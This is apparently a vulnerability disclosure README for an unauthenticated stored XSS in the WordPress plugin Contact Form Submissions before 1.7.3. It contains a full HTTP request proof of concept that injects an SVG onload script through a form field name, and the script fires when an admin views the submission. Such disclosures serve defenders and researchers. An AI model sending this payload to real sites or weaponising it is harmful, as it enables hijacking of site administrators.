.. | |||
README.md | Loading last commit info... |
README.md
Contact Form Submissions < 1.7.3 - Unauthenticated Stored XSS
Description
The plugin does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission
Proof of Concept
POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470
X-Requested-With: XMLHttpRequest
Content-Length: 726
Connection: close
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"
Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"
[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"
XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"
Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="<svg/onload=(alert)(/XSS/)>"
Injected
-----------------------------243715402120191890871051639470--
The XSS will be triggered when an admin view the related submission
References
https://wpscan.com/vulnerability/d02cf542-2d75-46bc-a0df-67bbe501cc89